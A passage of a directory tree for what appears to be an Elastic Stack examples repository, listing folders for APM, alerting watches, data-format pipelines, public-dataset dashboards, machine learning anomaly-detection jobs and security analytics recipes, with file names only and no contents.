├── .gitattributes
├── .gitignore
├── APM
    └── Node.js
    │   └── Kubernetes
    │       ├── .dockerignore
    │       ├── .gitignore
    │       ├── Dockerfile
    │       ├── ELASTIC_APM_SECRET_TOKEN
    │       ├── ELASTIC_APM_SERVER_URL
    │       ├── ELASTIC_APM_SERVICE_NAME
    │       ├── README.md
    │       ├── images
    │           ├── APM-1.png
    │           ├── APM-2.png
    │           ├── APM-3.png
    │           ├── APM-4.png
    │           ├── APM-5.png
    │           ├── Node-1.png
    │           └── Node-2.png
    │       ├── namespace.yaml
    │       ├── node-express.yaml
    │       ├── package.json
    │       └── server.js
├── Alerting
    ├── Sample Watches
    │   ├── .gitignore
    │   ├── README.md
    │   ├── cpu_iowait_hosts
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── calculate_iowait.json
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── errors_in_logs
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── filesystem_usage
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── large_shard_watch
    │   │   ├── README.md
    │   │   └── watch.json
    │   ├── lateral_movement_in_user_comm
    │   │   ├── README.md
    │   │   ├── ingest.json
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   ├── lower_time.json
    │   │   │   ├── transform.json
    │   │   │   └── upper_time.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── load_watch.sh
    │   ├── ml_examples
    │   │   ├── README.md
    │   │   ├── bucket_record_chain_watch.json
    │   │   ├── bucket_watch.json
    │   │   ├── chained_watch.json
    │   │   ├── default_ml_watch.json
    │   │   ├── default_ml_watch_email.json
    │   │   └── multiple_jobs_watch.json
    │   ├── monitoring_cluster_health
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── monitoring_free_disk_space
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── new_process_started
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── port_scan
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   ├── index_transform.json
    │   │   │   └── log_transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── requirements.txt
    │   ├── run_all_tests.sh
    │   ├── run_test.py
    │   ├── run_test.sh
    │   ├── system_fails_to_provide_data
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── twitter_trends
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   └── condition.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   └── unexpected_account_activity
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │       ├── condition.json
    │   │       └── transform.json
    │   │   ├── tests
    │   │       └── test1.json
    │   │   └── watch.json
    └── watcher_dashboard
    │   ├── README.md
    │   └── watch_history_dashboard.json
├── CONTRIBUTING.md
├── Cloud Enterprise
    └── Getting Started Examples
    │   ├── aws
    │       └── terraform
    │       │   ├── .gitignore
    │       │   ├── README.md
    │       │   ├── ansible-install.sh
    │       │   ├── main.tf
    │       │   ├── networking.tf
    │       │   ├── provider.tf
    │       │   ├── servers.tf
    │       │   ├── terraform.tfvars.example
    │       │   └── variables.tf
    │   └── gcp
    │       └── terraform
    │           ├── .gitignore
    │           ├── README.md
    │           ├── ansible-install.sh
    │           ├── main.tf
    │           ├── networking.tf
    │           ├── provider.tf
    │           ├── servers.tf
    │           ├── terraform.tfvars.example
    │           └── variables.tf
├── Common Data Formats
    ├── apache_logs
    │   ├── README.md
    │   ├── apache_dashboard.jpg
    │   ├── apache_logs
    │   └── logstash
    │   │   ├── apache_kibana-4.json
    │   │   ├── apache_kibana.json
    │   │   ├── apache_logstash.conf
    │   │   └── apache_template.json
    ├── cef
    │   ├── README.md
    │   ├── cef_dashboard.png
    │   ├── dashboard.json
    │   ├── docker-compose.yml
    │   └── logstash
    │   │   ├── Dockerfile
    │   │   └── pipeline
    │   │       ├── cef_template.json
    │   │       └── logstash.conf
    ├── nginx_json_logs
    │   ├── README.md
    │   ├── logstash
    │   │   └── nginx_json_logstash.conf
    │   ├── nginx_json_dashboard.jpg
    │   ├── nginx_json_filebeat.yml
    │   ├── nginx_json_kibana.json
    │   ├── nginx_json_logs
    │   └── nginx_json_template.json
    ├── nginx_json_plus_logs
    │   ├── README.md
    │   ├── logstash
    │   │   └── nginxplus_json_logstash.conf
    │   ├── nginx_plus_json_dashboard.jpg
    │   ├── nginxplus_elastic_fields
    │   ├── nginxplus_filebeat.yml
    │   ├── nginxplus_json_kibana.json
    │   ├── nginxplus_json_logs
    │   └── nginxplus_json_pipeline.json
    ├── nginx_logs
    │   ├── README.md
    │   ├── logstash
    │   │   ├── nginx_kibana.json
    │   │   ├── nginx_logstash.conf
    │   │   └── nginx_template.json
    │   ├── nginx_dashboard.jpg
    │   └── nginx_logs
    └── twitter
    │   ├── README.md
    │   ├── twitter_dashboard.jpg
    │   ├── twitter_kibana.json
    │   ├── twitter_logstash.conf
    │   └── twitter_template.json
├── Exploring Public Datasets
    ├── cdc_nutrition_exercise_patterns
    │   ├── README.md
    │   ├── brfss_kibana_dashboard.json
    │   ├── kibana_exercise_dashboard.jpg
    │   ├── kibana_nutrition_dashboard.jpg
    │   └── scripts
    │   │   ├── README.md
    │   │   ├── State.csv
    │   │   ├── activity.csv
    │   │   ├── brfss_mapping.json
    │   │   ├── process_brfss_data.ipynb
    │   │   ├── process_brfss_data.py
    │   │   ├── requirements.txt
    │   │   └── variable_list.csv
    ├── donorschoose
    │   ├── README.md
    │   ├── donorschoose_dashboard.jpg
    │   ├── donorschoose_dashboard.json
    │   └── scripts
    │   │   ├── README.md
    │   │   ├── donorschoose_mapping.json
    │   │   ├── donorschoose_process_data.ipynb
    │   │   ├── donorschoose_process_data.py
    │   │   └── requirements.txt
    ├── earthquakes
    │   ├── README.md
    │   ├── ncedc-earthquakes-dashboards.json
    │   ├── ncedc-earthquakes-dataset.tar.gz
    │   ├── ncedc-earthquakes-filebeat.yml
    │   ├── ncedc-earthquakes-logstash.conf
    │   ├── ncedc-earthquakes-pipeline.json
    │   ├── ncedc-earthquakes-screenshot.png
    │   └── ncedc-earthquakes-template.json
    ├── nhl
    │   ├── README.md
    │   ├── against.png
    │   ├── clean.sh
    │   ├── dashboards.json
    │   ├── game.png
    │   ├── geo-arena
    │   │   ├── README.md
    │   │   ├── arena-viz.png
    │   │   ├── arena.tiff
    │   │   └── kibana-settings.png
    │   ├── go.js
    │   └── package.json
    ├── nyc_restaurants
    │   ├── README.md
    │   ├── restaurants_kibana.jpg
    │   ├── restaurants_kibana.json
    │   └── scripts
    │   │   ├── README.md
    │   │   ├── ingestRestaurantData.ipynb
    │   │   ├── ingestRestaurantData.py
    │   │   ├── inspection_mapping.json
    │   │   └── requirements.txt
    ├── nyc_traffic_accidents
    │   ├── README.md
    │   ├── nyc_collision_filebeat.yml
    │   ├── nyc_collision_kibana.json
    │   ├── nyc_collision_logstash.conf
    │   ├── nyc_collision_pipeline.json
    │   └── nyc_collision_template.json
    └── usfec
    │   ├── README.md
    │   ├── scripts
    │       ├── README.md
    │       ├── US.txt
    │       ├── usfec_logstash.conf
    │       ├── usfec_process_data.py
    │       ├── usfec_template.json
    │       └── zip_codes.csv
    │   ├── usfec_dashboard.jpg
    │   └── usfec_kibana.json
├── GCP Dataflow to Elasticsearch
    ├── .gitignore
    ├── .tool-versions
    ├── README.md
    ├── audit.tf
    ├── main.tf
    └── vars.tf
├── GKE-On-Prem
    ├── README.md
    ├── elasticsearch-hosts-ports
    ├── filebeat-kubernetes.yaml
    ├── filebeat-setup.yaml
    ├── guestbook.yaml
    ├── journalbeat-kubernetes.yaml
    ├── kibana-host-port
    ├── metricbeat-kubernetes.yaml
    └── metricbeat-setup.yaml
├── Graph
    ├── apache_logs_security_analysis
    │   ├── README.md
    │   ├── download_data.py
    │   ├── filebeat_secrepo.yml
    │   ├── logstash
    │   │   ├── patterns
    │   │   │   └── custom
    │   │   └── secrepo_logstash.conf
    │   ├── requirements.txt
    │   ├── secrepo.json
    │   ├── secrepo_graph.jpg
    │   └── secrepo_pipeline.json
    └── movie_recommendations
    │   ├── README.md
    │   ├── download_data.py
    │   ├── index_ratings.py
    │   ├── index_users.py
    │   ├── movie_lens.json
    │   ├── movie_lens_date_clustering.jpg
    │   ├── movie_lens_example_graph.jpg
    │   ├── movie_lens_total_reviews_by_date.png
    │   └── requirements.txt
├── Installation and Setup.md
├── LICENSE
├── Machine Learning
    ├── Analytics Jupyter Notebooks
    │   ├── README.md
    │   ├── ml-analytics-classification-requirements.txt
    │   └── ml-analytics-classification.ipynb
    ├── Anomaly Detection
    │   ├── README.md
    │   ├── apm_jsbase
    │   │   ├── README.md
    │   │   ├── abnormal_span_durations_jsbase.json
    │   │   ├── anomalous_error_rate_for_user_agents_jsbase.json
    │   │   ├── decreased_throughput_jsbase.json
    │   │   └── high_count_by_user_agent_jsbase.json
    │   ├── apm_nodejs
    │   │   ├── README.md
    │   │   ├── abnormal_span_durations_nodejs.json
    │   │   ├── abnormal_trace_durations_nodejs.json
    │   │   └── decreased_throughput_nodejs.json
    │   ├── security_linux
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_v2_linux_anomalous_network_port_activity_ecs.json
    │   │   │   ├── datafeed_v2_linux_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── datafeed_v2_linux_anomalous_user_name_ecs.json
    │   │   │   ├── datafeed_v2_linux_rare_metadata_process.json
    │   │   │   ├── datafeed_v2_linux_rare_metadata_user.json
    │   │   │   ├── datafeed_v2_rare_process_by_host_linux_ecs.json
    │   │   │   ├── v2_linux_anomalous_network_port_activity_ecs.json
    │   │   │   ├── v2_linux_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── v2_linux_anomalous_user_name_ecs.json
    │   │   │   ├── v2_linux_rare_metadata_process.json
    │   │   │   ├── v2_linux_rare_metadata_user.json
    │   │   │   └── v2_rare_process_by_host_linux_ecs.json
    │   ├── security_windows
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_v2_rare_process_by_host_windows_ecs.json
    │   │   │   ├── datafeed_v2_windows_anomalous_network_activity_ecs.json
    │   │   │   ├── datafeed_v2_windows_anomalous_path_activity_ecs.json
    │   │   │   ├── datafeed_v2_windows_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── datafeed_v2_windows_anomalous_process_creation.json
    │   │   │   ├── datafeed_v2_windows_anomalous_user_name_ecs.json
    │   │   │   ├── datafeed_v2_windows_rare_metadata_process.json
    │   │   │   ├── datafeed_v2_windows_rare_metadata_user.json
    │   │   │   ├── v2_rare_process_by_host_windows_ecs.json
    │   │   │   ├── v2_windows_anomalous_network_activity_ecs.json
    │   │   │   ├── v2_windows_anomalous_path_activity_ecs.json
    │   │   │   ├── v2_windows_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── v2_windows_anomalous_process_creation.json
    │   │   │   ├── v2_windows_anomalous_user_name_ecs.json
    │   │   │   ├── v2_windows_rare_metadata_process.json
    │   │   │   └── v2_windows_rare_metadata_user.json
    │   ├── siem_auditbeat
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_linux_anomalous_network_activity_ecs.json
    │   │   │   ├── datafeed_linux_anomalous_network_port_activity_ecs.json
    │   │   │   ├── datafeed_linux_anomalous_network_service.json
    │   │   │   ├── datafeed_linux_anomalous_network_url_activity_ecs.json
    │   │   │   ├── datafeed_linux_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── datafeed_linux_anomalous_user_name_ecs.json
    │   │   │   ├── datafeed_linux_network_configuration_discovery.json
    │   │   │   ├── datafeed_linux_network_connection_discovery.json
    │   │   │   ├── datafeed_linux_rare_kernel_module_arguments.json
    │   │   │   ├── datafeed_linux_rare_metadata_process.json
    │   │   │   ├── datafeed_linux_rare_metadata_user.json
    │   │   │   ├── datafeed_linux_rare_sudo_user.json
    │   │   │   ├── datafeed_linux_rare_user_compiler.json
    │   │   │   ├── datafeed_linux_system_information_discovery.json
    │   │   │   ├── datafeed_linux_system_process_discovery.json
    │   │   │   ├── datafeed_linux_system_user_discovery.json
    │   │   │   ├── datafeed_rare_process_by_host_linux_ecs.json
    │   │   │   ├── linux_anomalous_network_activity_ecs.json
    │   │   │   ├── linux_anomalous_network_port_activity_ecs.json
    │   │   │   ├── linux_anomalous_network_service.json
    │   │   │   ├── linux_anomalous_network_url_activity_ecs.json
    │   │   │   ├── linux_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── linux_anomalous_user_name_ecs.json
    │   │   │   ├── linux_network_configuration_discovery.json
    │   │   │   ├── linux_network_connection_discovery.json
    │   │   │   ├── linux_rare_kernel_module_arguments.json
    │   │   │   ├── linux_rare_metadata_process.json
    │   │   │   ├── linux_rare_metadata_user.json
    │   │   │   ├── linux_rare_sudo_user.json
    │   │   │   ├── linux_rare_user_compiler.json
    │   │   │   ├── linux_system_information_discovery.json
    │   │   │   ├── linux_system_process_discovery.json
    │   │   │   ├── linux_system_user_discovery.json
    │   │   │   └── rare_process_by_host_linux_ecs.json
    │   ├── siem_auditbeat_auth
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_suspicious_login_activity_ecs.json
    │   │   │   └── suspicious_login_activity_ecs.json
    │   ├── siem_winlogbeat
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_rare_process_by_host_windows_ecs.json
    │   │   │   ├── datafeed_windows_anomalous_network_activity_ecs.json
    │   │   │   ├── datafeed_windows_anomalous_path_activity_ecs.json
    │   │   │   ├── datafeed_windows_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── datafeed_windows_anomalous_process_creation.json
    │   │   │   ├── datafeed_windows_anomalous_script.json
    │   │   │   ├── datafeed_windows_anomalous_service.json
    │   │   │   ├── datafeed_windows_anomalous_user_name_ecs.json
    │   │   │   ├── datafeed_windows_rare_metadata_process.json
    │   │   │   ├── datafeed_windows_rare_metadata_user.json
    │   │   │   ├── datafeed_windows_rare_user_runas_event.json
    │   │   │   ├── rare_process_by_host_windows_ecs.json
    │   │   │   ├── windows_anomalous_network_activity_ecs.json
    │   │   │   ├── windows_anomalous_path_activity_ecs.json
    │   │   │   ├── windows_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── windows_anomalous_process_creation.json
    │   │   │   ├── windows_anomalous_script.json
    │   │   │   ├── windows_anomalous_service.json
    │   │   │   ├── windows_anomalous_user_name_ecs.json
    │   │   │   ├── windows_rare_metadata_process.json
    │   │   │   ├── windows_rare_metadata_user.json
    │   │   │   └── windows_rare_user_runas_event.json
    │   └── siem_winlogbeat_auth
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │       ├── datafeed_windows_rare_user_type10_remote_login.json
    │   │       └── windows_rare_user_type10_remote_login.json
    ├── Business Metrics Recipes
    │   ├── README.md
    │   ├── scripts
    │   │   └── reset_job.sh
    │   └── twitter_trends
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │       ├── filebeat
    │   │       │   └── filebeat.yml
    │   │       ├── logstash
    │   │       │   └── logstash.conf
    │   │       └── templates
    │   │       │   └── twitter.json
    │   │   ├── data
    │   │       └── tweets.csv
    │   │   └── machine_learning
    │   │       ├── data_feed.json
    │   │       └── job.json
    ├── Class Assigment Objectives
    │   ├── README.md
    │   ├── classification-class-assignment-objective.ipynb
    │   └── requirements.txt
    ├── DGA Detection
    │   ├── README.md
    │   ├── detecting-dga-activity-in-network-data.md
    │   ├── ngram-extractor-reindex.json
    │   └── training-supervised-models-to-detect-dga-activity.md
    ├── Data Frames
    │   ├── anonreviews.csv.bz2
    │   ├── pivot_review_data_elastic.ipynb
    │   └── pivot_review_data_pandas.ipynb
    ├── Feature Importance
    │   ├── README.md
    │   ├── feature_importance_in_elasticsearch.ipynb
    │   └── requirements.txt
    ├── Getting Started Examples
    │   ├── README.md
    │   ├── server_metrics
    │   │   ├── README.md
    │   │   ├── ingest-data.sh
    │   │   └── kibana-dashboard.json
    │   └── user_activity
    │   │   ├── README.md
    │   │   └── ingest-data.sh
    ├── IT Operations Recipes
    │   ├── README.md
    │   ├── scripts
    │   │   └── reset_job.sh
    │   ├── service_response_change
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │   │   └── filebeat
    │   │   │   │   └── default.json
    │   │   ├── data
    │   │   │   └── apache_logs.log
    │   │   └── machine_learning
    │   │   │   ├── data_feed.json
    │   │   │   ├── job.json
    │   │   │   └── reset_job.sh
    │   └── system_metric_change
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │       ├── ingest
    │   │       │   └── core_id.json
    │   │       └── metricbeat
    │   │       │   └── metricbeat.yml
    │   │   └── machine_learning
    │   │       ├── data_feed.json
    │   │       └── job.json
    ├── Online Search Relevance Metrics
    │   ├── .gitignore
    │   ├── Makefile
    │   ├── README.md
    │   ├── bin
    │   │   ├── complete
    │   │   ├── index
    │   │   ├── kibana
    │   │   ├── prepare
    │   │   └── simulate
    │   ├── config
    │   │   ├── ecs
    │   │   │   ├── custom
    │   │   │   │   ├── search_metrics.yml
    │   │   │   │   └── search_metrics_simulation.yml
    │   │   │   └── subset.yml
    │   │   ├── indices
    │   │   │   ├── ecs-search-metrics.json
    │   │   │   ├── ecs-search-metrics_transform_completion.json
    │   │   │   └── ecs-search-metrics_transform_queryid.json
    │   │   ├── kibana
    │   │   │   └── dashboard.json
    │   │   ├── pipelines
    │   │   │   ├── ecs-search-metrics.json
    │   │   │   ├── ecs-search-metrics_transform_completion.json
    │   │   │   ├── ecs-search-metrics_transform_queryid.json
    │   │   │   ├── sc-click-events.json
    │   │   │   └── sc-query-events.json
    │   │   └── transforms
    │   │   │   ├── ecs-search-metrics_transform_completion.json
    │   │   │   └── ecs-search-metrics_transform_queryid.json
    │   ├── metrics
    │   │   ├── __init__.py
    │   │   ├── resources.py
    │   │   └── simulate.py
    │   ├── notebooks
    │   │   └── Metrics with eland.ipynb
    │   ├── requirements.txt
    │   ├── setup.py
    │   └── tests
    │   │   ├── __init__.py
    │   │   ├── integration
    │   │       ├── __init__.py
    │   │       └── test_integration.py
    │   │   └── unit
    │   │       ├── __init__.py
    │   │       └── test_simulate.py
    ├── Outlier Detection
    │   ├── Introduction
    │   │   ├── README.md
    │   │   ├── advent-outliers.ipynb
    │   │   └── requirements.txt
    │   └── README.md
    ├── ProblemChild
    │   ├── README.md
    │   ├── blocklist.json
    │   ├── blocklist_keywords.txt
    │   ├── datafeeds
    │   │   ├── datafeed-experimental-high-sum-by-host-problemchild.json
    │   │   ├── datafeed-experimental-high-sum-by-parent-problemchild.json
    │   │   ├── datafeed-experimental-high-sum-by-user-problemchild.json
    │   │   ├── datafeed-experimental-rare-process--by-parent-problemchild.json
    │   │   ├── datafeed-experimental-rare-process-by-host-problemchild.json
    │   │   └── datafeed-experimental-rare-process-by-user-problemchild.json
    │   ├── features.json
    │   ├── job_configs
    │   │   ├── experimental-high-sum-by-host-problemchild.json
    │   │   ├── experimental-high-sum-by-parent-problemchild.json
    │   │   ├── experimental-high-sum-by-user-problemchild.json
    │   │   ├── experimental-rare-process-by-host-problemchild.json
    │   │   ├── experimental-rare-process-by-parent-problemchild.json
    │   │   └── experimental-rare-process-by-user-problemchild.json
    │   ├── ngram_extractor.json
    │   ├── normalize_ppath.json
    │   ├── problemchild-end-to-end.md
    │   ├── problemchild_features.json
    │   └── problemchild_inference.json
    ├── Query Optimization
    │   ├── .gitignore
    │   ├── Makefile
    │   ├── README.md
    │   ├── bin
    │   │   ├── bulk-index
    │   │   ├── bulk-search
    │   │   ├── convert-msmarco-document-corpus
    │   │   ├── eval
    │   │   ├── optimize-query
    │   │   └── split-and-sample
    │   ├── config
    │   │   ├── metric-mrr-100.json
    │   │   ├── msmarco-document-index.custom.json
    │   │   ├── msmarco-document-index.defaults.json
    │   │   ├── msmarco-document-index.doc2query.json
    │   │   ├── msmarco-document-templates.doc2query.json
    │   │   ├── msmarco-document-templates.json
    │   │   ├── optimize-query.best_fields.json
    │   │   ├── optimize-query.cross_fields.json
    │   │   ├── params.best_fields.baseline.json
    │   │   └── params.cross_fields.baseline.json
    │   ├── notebooks
    │   │   ├── 0 - Analyzers.ipynb
    │   │   ├── 1 - Query tuning.ipynb
    │   │   ├── 2 - Query tuning - best_fields.ipynb
    │   │   ├── Appendix A - BM25 tuning.ipynb
    │   │   ├── Appendix B - Combining queries.ipynb
    │   │   ├── Appendix C - most_fields.ipynb
    │   │   ├── Appendix.ipynb
    │   │   ├── doc2query - 1 - BM25 tuning.ipynb
    │   │   ├── doc2query - 2 - best_fields.ipynb
    │   │   ├── doc2query - 3 - most_fields.ipynb
    │   │   └── doc2query - 4 - linear combo.ipynb
    │   ├── qopt
    │   │   ├── __init__.py
    │   │   ├── eval.py
    │   │   ├── notebooks.py
    │   │   ├── optimize.py
    │   │   ├── search.py
    │   │   ├── trec.py
    │   │   └── util.py
    │   ├── requirements.txt
    │   ├── submissions
    │   │   ├── 20201125-elastic-optimized_best_fields
    │   │   │   ├── metadata.json
    │   │   │   └── params.json
    │   │   └── 20210120-elastic-doc2query_optimized_most_fields
    │   │   │   ├── metadata.json
    │   │   │   └── params.json
    │   └── tests
    │   │   ├── __init__.py
    │   │   └── test_optimize.py
    ├── README.md
    ├── Regression Loss Functions
    │   ├── README.md
    │   ├── regression-loss-functions.ipynb
    │   └── requirements.txt
    ├── Security Analytics Recipes
    │   ├── README.md
    │   ├── dns_data_exfiltration
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── TODO
    │   │   ├── configs
    │   │   │   ├── ingest
    │   │   │   │   └── extract_subdomain.json
    │   │   │   └── packetbeat
    │   │   │   │   └── packetbeat.yml
    │   │   ├── machine_learning
    │   │   │   ├── data_feed.json
    │   │   │   └── job.json
    │   │   └── scripts
    │   │   │   ├── dns_exfil_random.sh
    │   │   │   └── dns_exfil_random_osx.sh
    │   ├── http_data_exfiltration
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │   │   └── packetbeat
    │   │   │   │   └── packetbeat.yml
    │   │   ├── machine_learning
    │   │   │   ├── data_feed.json
    │   │   │   └── job.json
    │   │   └── scripts
    │   │   │   ├── client.sh
    │   │   │   └── server.sh
    │   ├── scripts
    │   │   └── reset_job.sh
    │   ├── suspicious_login_activity
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │   │   └── filebeat
    │   │   │   │   └── filebeat.yml
    │   │   ├── data
    │   │   │   └── auth.log
    │   │   └── machine_learning
    │   │   │   ├── data_feed.json
    │   │   │   └── job.json
    │   └── suspicious_process_activity
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │       └── filebeat
    │   │       │   └── filebeat.yml
    │   │   ├── machine_learning
    │   │       ├── data_feed.json
    │   │       └── job.json
    │   │   └── scripts
    │   │       └── start_random_process.sh
    └── Transforms
    │   └── super-alerts package
├── Maps
    └── Getting Started Examples
    │   └── geojson_upload_and_styling
    │       ├── bangor_international_airport.geojson
    │       ├── lightning_detected.geojson
    │       ├── logan_international_airport.geojson
    │       ├── modified_flight_path.geojson
    │       └── original_flight_path.geojson
├── Miscellaneous
    ├── custom_tile_maps
    │   ├── README.md
    │   ├── __init__.py
    │   ├── elastic{ON}_full_floor_plan.pdf
    │   ├── elastic{ON}_simplified.svg
    │   ├── generate_random_data.py
    │   ├── requirements.txt
    │   ├── shape_files
    │   │   ├── demo_booths.dbf
    │   │   ├── demo_booths.prj
    │   │   ├── demo_booths.qix
    │   │   ├── demo_booths.qpj
    │   │   ├── demo_booths.shp
    │   │   ├── demo_booths.shx
    │   │   ├── demo_stands.dbf
    │   │   ├── demo_stands.prj
    │   │   ├── demo_stands.qix
    │   │   ├── demo_stands.qpj
    │   │   ├── demo_stands.shp
    │   │   ├── demo_stands.shx
    │   │   ├── inner_wall.dbf
    │   │   ├── inner_wall.prj
    │   │   ├── inner_wall.qix
    │   │   ├── inner_wall.qpj
    │   │   ├── inner_wall.shp
    │   │   ├── inner_wall.shx
    │   │   ├── outer_wall.dbf
    │   │   ├── outer_wall.prj
    │   │   ├── outer_wall.qix
    │   │   ├── outer_wall.qpj
    │   │   ├── outer_wall.shp
    │   │   └── outer_wall.shx
    │   └── styles
    │   │   ├── demo_booths.xml
    │   │   ├── demo_stands.xml
    │   │   ├── inner_walls.xml
    │   │   └── outer_walls.xml
    ├── docker
    │   ├── CHANGES.md
    │   ├── README.md
    │   ├── create_packages.sh
    │   └── full_stack_example
    │   │   ├── .env
    │   │   ├── .kitchen
    │   │       └── logs
    │   │       │   └── kitchen.log
    │   │   ├── README.md
    │   │   ├── config
    │   │       ├── apache2
    │   │       │   ├── Dockerfile
    │   │       │   └── httpd.conf
    │   │       ├── beats
    │   │       │   ├── filebeat
    │   │       │   │   ├── filebeat.yml
    │   │       │   │   └── prospectors.d
    │   │       │   │   │   └── docker.yml
    │   │       │   ├── heartbeat
    │   │       │   │   └── heartbeat.yml
    │   │       │   ├── metricbeat
    │   │       │   │   ├── metricbeat.yml
    │   │       │   │   └── modules.d
    │   │       │   │   │   ├── apache.yml
    │   │       │   │   │   ├── docker.yml
    │   │       │   │   │   ├── mysql.yml
    │   │       │   │   │   ├── nginx.yml
    │   │       │   │   │   └── system.yml
    │   │       │   └── packetbeat
    │   │       │   │   └── packetbeat.yml
    │   │       ├── elasticsearch
    │   │       │   └── elasticsearch.yml
    │   │       ├── kibana
    │   │       │   └── kibana.yml
    │   │       ├── mysql
    │   │       │   ├── Dockerfile
    │   │       │   └── conf-file.cnf
    │   │       └── nginx
    │   │       │   ├── Dockerfile
    │   │       │   └── nginx.conf
    │   │   ├── docker-compose-linux.yml
    │   │   ├── docker-compose-osx.yml
    │   │   ├── docker-compose-windows.yml
    │   │   ├── full_stack_example.tar.gz
    │   │   ├── full_stack_example.zip
    │   │   └── init
    │   │       ├── configure-stack.sh
    │   │       ├── pipelines
    │   │           └── docker-logs.json
    │   │       └── templates
    │   │           └── docker-logs.json
    ├── gdpr
    │   └── pseudonymization
    │   │   ├── Dockerfile
    │   │   ├── README.md
    │   │   ├── docker-compose.yml
    │   │   ├── logstash_fingerprint.conf
    │   │   ├── logstash_script_fingerprint.conf
    │   │   ├── pipelines.yml
    │   │   ├── pseudonymise.rb
    │   │   └── sample_docs
    ├── kafka_logstash
    │   ├── README
    │   ├── gc.conf
    │   └── grok-custom-patterns
    ├── kafka_monitoring
    │   ├── README.md
    │   └── filebeat_monitoring
    │   │   ├── README.md
    │   │   ├── es
    │   │       ├── fb-kafka.template.json
    │   │       ├── kafka-gc-logs.json
    │   │       └── kafka-logs.json
    │   │   ├── es_stack
    │   │       └── docker-compose.yml
    │   │   ├── filebeat.yml
    │   │   ├── kibana
    │   │       ├── dashboard
    │   │       │   ├── Kafka-GC-Logs.json
    │   │       │   └── Kafka-Logs.json
    │   │       ├── search
    │   │       │   ├── Kafka-Logs-Stack-Traces.json
    │   │       │   └── Kafka-Logs-Table.json
    │   │       └── visualization
    │   │       │   ├── Kafka-GC-Eden-Delta-Total.json
    │   │       │   ├── Kafka-GC-Eden-Delta-Used.json
    │   │       │   ├── Kafka-GC-Heap-Delta.json
    │   │       │   ├── Kafka-GC-Pauses.json
    │   │       │   ├── Kafka-GC-Survivors-Delta.json
    │   │       │   ├── Kafka-Log-Count-Stacktraces-Components.json
    │   │       │   ├── Kafka-Log-Count-Stacktraces-Nodes.json
    │   │       │   └── Kafka-Logs-Count.json
    │   │   └── logs
    │   │       ├── kafka0
    │   │           └── logs
    │   │           │   ├── controller.log
    │   │           │   ├── controller.log.2016-12-19-16
    │   │           │   ├── controller.log.2016-12-19-17
    │   │           │   ├── controller.log.2016-12-19-18
    │   │           │   ├── controller.log.2016-12-19-19
    │   │           │   ├── controller.log.2016-12-19-20
    │   │           │   ├── controller.log.2016-12-19-21
    │   │           │   ├── controller.log.2016-12-19-22
    │   │           │   ├── controller.log.2016-12-19-23
    │   │           │   ├── kafka-authorizer.log
    │   │           │   ├── kafka-request.log
    │   │           │   ├── kafkaServer-gc.log
    │   │           │   ├── log-cleaner.log
    │   │           │   ├── log-cleaner.log.2016-12-19-16
    │   │           │   ├── server.log
    │   │           │   ├── server.log.2016-12-19-16
    │   │           │   ├── server.log.2016-12-19-17
    │   │           │   ├── server.log.2016-12-19-18
    │   │           │   ├── server.log.2016-12-19-19
